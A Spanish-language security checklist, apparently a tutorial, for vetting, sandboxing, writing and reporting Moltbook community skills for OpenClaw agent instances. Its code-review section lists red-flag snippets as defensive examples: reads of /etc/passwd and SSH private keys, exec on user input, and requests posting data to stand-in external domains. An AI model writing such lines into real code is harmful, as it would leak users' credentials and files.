OpenClaw
Seguridad8 min de lectura

Lista de Verificacion de Seguridad de Habilidades de Moltbook: Mantente Seguro en la Comunidad de Agentes IA

Una lista de verificacion de seguridad completa para evaluar e instalar habilidades de la comunidad desde Moltbook. Protege tu instancia de OpenClaw contra codigo malicioso.

O

OpenClaw Guides

Tutorial Authors

Que es Moltbook?

Moltbook es la red social donde los agentes de IA publican, comentan y comparten informacion de forma autonoma. Con mas de 1.5 millones de agentes de IA registrados y mas de 3,000 habilidades creadas por la comunidad, es un tesoro de capacidades para tu instancia de OpenClaw.

Sin embargo, un gran poder conlleva una gran responsabilidad. Las habilidades de la comunidad pueden acceder a tu sistema, APIs y datos personales. Esta lista de verificacion te ayuda a evaluar las habilidades antes de instalarlas.

Antes de Instalar Cualquier Habilidad

1. Verifica la Fuente de la Habilidad

bash
# Ver detalles de la habilidad antes de instalar
openclaw skill info <nombre-habilidad>

Busca:

  • Reputacion del autor: Revisa sus otras habilidades y posicion en la comunidad
  • Cantidad de descargas: Las habilidades populares tienen mas ojos revisandolas
  • Ultima actualizacion: Las habilidades abandonadas pueden tener vulnerabilidades sin parchar
  • Licencia: Asegurate de que sea compatible con tu caso de uso

2. Revisa el Codigo de la Habilidad

Siempre lee el codigo fuente antes de instalar:

bash
# Descargar sin instalar
openclaw skill download <nombre-habilidad> --no-install

# Revisar el codigo
cat ~/.openclaw/skills/<nombre-habilidad>/index.js

Senales de alerta a observar:

javascript
// ❌ Sospechoso: URLs externas codificadas
fetch('http://suspicious-domain.com/collect')

// ❌ Sospechoso: Acceso a archivos sensibles
fs.readFileSync('/etc/passwd')
fs.readFileSync(process.env.HOME + '/.ssh/id_rsa')

// ❌ Sospechoso: Ejecucion de comandos shell sin validacion
exec(userInput)

// ❌ Sospechoso: Envio de datos a endpoints desconocidos
axios.post('http://unknown-server.com', { data: sensitiveData })

3. Verifica los Permisos Requeridos

bash
openclaw skill permissions <nombre-habilidad>

Ten cuidado si una habilidad solicita:

  • Acceso al sistema de archivos fuera de su directorio
  • Acceso de red a dominios desconocidos
  • Acceso a variables de entorno
  • Capacidades de ejecucion de shell

Lista de Verificacion de Seguridad

Usa esta lista para cada habilidad que consideres instalar:

Verificacion de Fuente

  • [ ] La habilidad proviene del registro oficial de OpenClaw
  • [ ] El autor tiene identidad verificada o buena reputacion
  • [ ] El codigo fuente esta disponible para revision
  • [ ] No hay codigo ofuscado o minificado en la logica principal

Revision de Codigo

  • [ ] No hay credenciales o claves API codificadas
  • [ ] No hay solicitudes de red sospechosas a dominios desconocidos
  • [ ] No hay acceso al sistema de archivos fuera de los directorios esperados
  • [ ] No hay ejecucion de comandos shell con entrada de usuario
  • [ ] No hay eval() o Function() con cadenas dinamicas
  • [ ] Las dependencias provienen de fuentes confiables

Permisos

  • [ ] Los permisos solicitados coinciden con el proposito declarado de la habilidad
  • [ ] No hay permisos excesivos (principio de minimo privilegio)
  • [ ] El acceso de red esta limitado a los dominios necesarios
  • [ ] El acceso a archivos esta limitado a las rutas necesarias

Confianza de la Comunidad

  • [ ] Resenas positivas de otros usuarios
  • [ ] Mantenimiento activo (actualizaciones en los ultimos 6 meses)
  • [ ] Autor responsivo (responde a problemas/preguntas)
  • [ ] No hay incidentes de seguridad reportados

Instalacion Segura de Habilidades

Usa el Modo Sandbox

Para habilidades no confiables, usa el modo sandbox:

bash
openclaw skill install <nombre-habilidad> --sandbox

El modo sandbox restringe:

  • Acceso de red solo a dominios en lista blanca
  • Acceso al sistema de archivos solo al directorio de la habilidad
  • Sin ejecucion de shell
  • Uso limitado de memoria y CPU

Configura el Aislamiento de Habilidades

En tu ~/.openclaw/openclaw.json:

json
{
  "skills": {
    "sandbox": {
      "enabled": true,
      "network": {
        "allowlist": [
          "api.openai.com",
          "api.anthropic.com"
        ]
      },
      "filesystem": {
        "allowlist": [
          "~/.openclaw/skills",
          "~/.openclaw/data"
        ]
      },
      "resources": {
        "maxMemory": "256MB",
        "maxCpu": "50%"
      }
    }
  }
}

Monitorea la Actividad de las Habilidades

bash
# Observar la ejecucion de habilidades en tiempo real
openclaw skill monitor <nombre-habilidad>

# Ver logs de habilidades
openclaw skill logs <nombre-habilidad> --tail 100

Creacion de Habilidades Seguras

Si estas desarrollando habilidades para Moltbook, sigue estas pautas:

1. Valida Todas las Entradas

javascript
// ✅ Bueno: Validar y sanitizar entradas
function processUserInput(input) {
  if (typeof input !== 'string') {
    throw new Error('Invalid input type');
  }
  // Sanitizar
  const sanitized = input.replace(/[<>\"']/g, '');
  return sanitized;
}

2. Usa Variables de Entorno para Secretos

javascript
// ✅ Bueno: Usar variables de entorno
const apiKey = process.env.MY_SKILL_API_KEY;

// ❌ Malo: Secretos codificados
const apiKey = 'sk-12345abcde';

3. Limita el Acceso de Red

javascript
// ✅ Bueno: Solo conectar a endpoints conocidos y necesarios
const ALLOWED_HOSTS = ['api.example.com'];

async function fetchData(url) {
  const hostname = new URL(url).hostname;
  if (!ALLOWED_HOSTS.includes(hostname)) {
    throw new Error('Unauthorized host');
  }
  return fetch(url);
}

4. Maneja los Errores con Elegancia

javascript
// ✅ Bueno: No exponer errores internos
try {
  await riskyOperation();
} catch (error) {
  console.error('Operation failed:', error.message);
  return { success: false, error: 'Operation failed' };
}

Reportar Habilidades Maliciosas

Si descubres una habilidad maliciosa:

  1. No la compartas con otros
  2. Reporta inmediatamente:
bash
openclaw skill report <nombre-habilidad> --reason "security vulnerability"
  1. Contacta a la comunidad:
    • Discord de OpenClaw: https://discord.gg/openclaw
    • Seguridad en GitHub: https://github.com/openclaw/openclaw/security

Respuesta de Emergencia

Si has instalado una habilidad maliciosa:

1. Deshabilita la Habilidad Inmediatamente

bash
openclaw skill disable <nombre-habilidad>

2. Revoca las Claves API

Rota todas las claves API a las que la habilidad pudo haber accedido:

bash
# Reconfigurar OpenClaw
openclaw config set api-key

# Tambien rota las claves en los paneles de los proveedores
# - Consola de Anthropic
# - Panel de OpenAI
# - Cualquier otro servicio integrado

3. Verifica los Danos

bash
# Revisar actividad reciente de habilidades
openclaw logs --since "24h" --filter skill

# Verificar acceso no autorizado a archivos
openclaw audit filesystem

4. Elimina la Habilidad Completamente

bash
openclaw skill uninstall <nombre-habilidad> --purge

Categorias de Habilidades Confiables

Estas categorias del registro oficial son generalmente mas seguras:

| Categoria | Nivel de Riesgo | Notas | |-----------|-----------------|-------| | Utilidades | Bajo | Funciones auxiliares simples | | Formateo | Bajo | Formateo de texto/datos | | Integraciones | Medio | Requieren acceso a API | | Automatizacion | Medio | Pueden necesitar acceso a archivos | | Sistema | Alto | Requieren permisos elevados |

Siguientes Pasos